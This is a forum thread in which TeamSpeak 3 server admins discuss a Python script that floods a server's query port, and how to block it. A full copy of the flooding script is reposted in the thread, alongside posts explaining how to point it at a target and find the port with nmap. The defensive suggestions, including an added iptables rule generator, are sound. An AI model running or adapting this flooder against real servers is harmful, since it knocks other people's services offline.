Beware of this script - TS3 SYN QUERY PORT FLOODING

developerm

Hello guys,

It's very important for public TeamSpeak 3 servers.
I have a very bad problem with this shit Python TeamSpeak 3 exploit.
https://www.dropbox.com/s/qb8zwfpoqrtvqtf/ts3exploit.py
This script floods the query port with SYN packets. After a while your server will crash or your query port will get rekt and you won't be able to access the query.
Look at the script's code, and if you have any idea how to protect query ports from this script, please post your comments.

(Sorry for my bad English)
 

Nýuu™

> If I change my query port, attackers can find my new query port with nmap very easily.
> Also, I don't want to close the query port to all IPs.

You don't need to close it to all IPs; just set a limit for it and you should be fine, and you can make it very hard to scan so that it takes years.
 

developerm

> You don't need to close it to all IPs; just set a limit for it and you should be fine, and you can make it very hard to scan so that it takes years.

So can you help me with an example of how I can do this on Ubuntu 16.04 64-bit?
 

Jackbox

My Python skills are a bit rusty, so pardon me. I have a feeling swapping the port for a variable would make sense too. :cool:

Code:
# TeamSpeak 3 'SYN/TCP' Flooding With Treading
# Using: /usr/bin/python ts3exploit.py
 
import socket
import threading
import random
 
class MonitorThread(threading.Thread):
        def run(self):
                try:
                        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                        #Change targetAddress to an IP for testing purposes.
                        targetAddress = "127.0.0.1"
                        s.connect((targetAddress, 10011))
                        for i in range(100):
                                s.send('login serveradmin')
                                s.sendto('login serveradmin',(targetAddress, 10011))
                                s.send('clientlist')
                                s.sendto('clientlist',(targetAddress, 10011))
                                s.send('channellist')
                                s.sendto('channellist',(targetAddress, 10011))
                                for i in range(100):
                                        s.send('serverinfo')
                                        s.sendto('serverinfo',(targetAddress, 10011))
                                        s.send('clientlist')
                                        s.sendto('clientlist',(targetAddress, 10011))
                                        for i in range(100):
                                                s.send('serverinfo')
                                                s.sendto('serverinfo',(targetAddress, 10011))
                                                s.send('channellist')
                                                s.sendto('channellist',(targetAddress, 10011))
                                print "\nFLOODING..."
                except Exception, ex:
                        pass
                     
for i in range(100):
        t = MonitorThread()
        t.start()
 

Kieran

This doesn't even work. I had 3 of those running for a while but nothing happened. Ping the same, reaction time the same, query works.
Okay, after around 5 minutes the packet loss is going up. Let's see what else is happening.

Nvm, not working. Don't know why it temporarily went up.
 

developerm

> This doesn't even work. I had 3 of those running for a while but nothing happened. Ping the same, reaction time the same, query works.
> Okay, after around 5 minutes the packet loss is going up. Let's see what else is happening.
>
> Nvm, not working. Don't know why it temporarily went up.

This script doesn't work on some IPs, like OVH Game or servers that have a limited packet size on the query port.
If you want to test, type your target IP and change the 10011 text to the query port. If you don't know the target server's query port, you can get it easily with an nmap TCP scan.

> My Python skills are a bit rusty, so pardon me. I have a feeling swapping the port for a variable would make sense too. :cool:


Changing only the IP address is not enough to attack; you also need to change the "10011" text to the target's query port.
If you don't know the target's query port, you can get it easily with nmap.

> Who coded that script xD

I got this script from my friend. I don't know where he got it, but I know that this script works on all TeamSpeak 3 server versions.
Helpppp
 

Kieran

> This script doesn't work on some IPs, like OVH Game or servers that have a limited packet size on the query port.
> If you want to test, type your target IP and change the 10011 text to the query port. If you don't know the target server's query port, you can get it easily with an nmap TCP scan.

Yes, I know my query port. I tried it on my own server and had 3 of them running at the same time. No effect. You sure that's even the script they are using?
 

Sigi

> Yes, I know my query port. I tried it on my own server and had 3 of them running at the same time. No effect. You sure that's even the script they are using?

I tried some servers, but sometimes it doesn't work. I think these protected servers did something to block this script, but I still don't know how I can save my servers from this script. Also, for now I have just closed port 10011 to all IPs. But I don't want that; I want my query port to always be online. If you have any idea about this, please comment.
 

Jackbox

> I tried some servers, but sometimes it doesn't work. I think these protected servers did something to block this script, but I still don't know how I can save my servers from this script. Also, for now I have just closed port 10011 to all IPs. But I don't want that; I want my query port to always be online. If you have any idea about this, please comment.

Pretty sure this is a generalized SYN flood. Look at SYN flood protection firewall rules.
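
Added example, not part of any post in this thread: the "set a limit" and "SYN flood protection firewall rules" suggestions above, written as an iptables rule generator for the Ubuntu server asked about. The posted script opens full TCP connections from 100 threads, so the rules cap both concurrent connections and new-connection rate per source IP; the chain name, the limits and the trusted address are assumed values.

```shell
#!/bin/sh
# Added example: print (not apply) iptables commands that limit the TS3 query port.
# Chain name, limits and the sample address are assumptions, not from the thread.

is_uint() { case "$1" in ''|*[!0-9]*) return 1 ;; esac; }

# usage: ts3_query_rules PORT MAX_CONN_PER_IP NEW_CONN_PER_MIN [TRUSTED_IP ...]
ts3_query_rules() {
    port=$1 max_conn=$2 rate=$3
    if ! { is_uint "$port" && is_uint "$max_conn" && is_uint "$rate"; }; then
        echo "usage: ts3_query_rules PORT MAX_CONN NEW_PER_MIN [IP ...]" >&2
        return 2
    fi
    if [ "$port" -lt 1 ] || [ "$port" -gt 65535 ]; then
        echo "port out of range: $port" >&2
        return 2
    fi
    shift 3
    # Validate every trusted address before printing anything, because the
    # output is meant to be run as root.
    for ip in "$@"; do
        case "$ip" in
            ''|*[!0-9./]*) echo "bad address: $ip" >&2; return 2 ;;
        esac
    done
    chain=TS3QUERY
    # SYN cookies keep the listen queue usable during a half-open SYN flood.
    echo "sysctl -w net.ipv4.tcp_syncookies=1"
    echo "iptables -N $chain"
    echo "iptables -I INPUT -p tcp --dport $port -j $chain"
    # Trusted management hosts (query bots, panels) bypass the limits.
    for ip in "$@"; do
        echo "iptables -A $chain -s $ip -j ACCEPT"
    done
    # Packets on connections that were already admitted pass through.
    echo "iptables -A $chain -m conntrack --ctstate ESTABLISHED -j ACCEPT"
    # Cap simultaneous connections per source address.
    echo "iptables -A $chain -p tcp --syn -m connlimit --connlimit-above $max_conn --connlimit-mask 32 -j REJECT --reject-with tcp-reset"
    # Cap the rate of new connections per source address.
    echo "iptables -A $chain -p tcp --syn -m hashlimit --hashlimit-name ts3query --hashlimit-mode srcip --hashlimit-above $rate/minute --hashlimit-burst $rate -j DROP"
    # Everything else falls back to the existing INPUT rules.
    echo "iptables -A $chain -j RETURN"
}

# Constructed sample: 5 connections and 20 new connections per minute per source.
ts3_query_rules 10011 5 20 203.0.113.10
```

Review the printed commands before running them as root. The query port stays reachable for everyone, but a single source can no longer hold or open connections without bound.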
 

sh4c4w

Instead of fully exposing your query port to the world, use a port knocking script.
It's pretty simple and adds a very good layer of security on your network.
 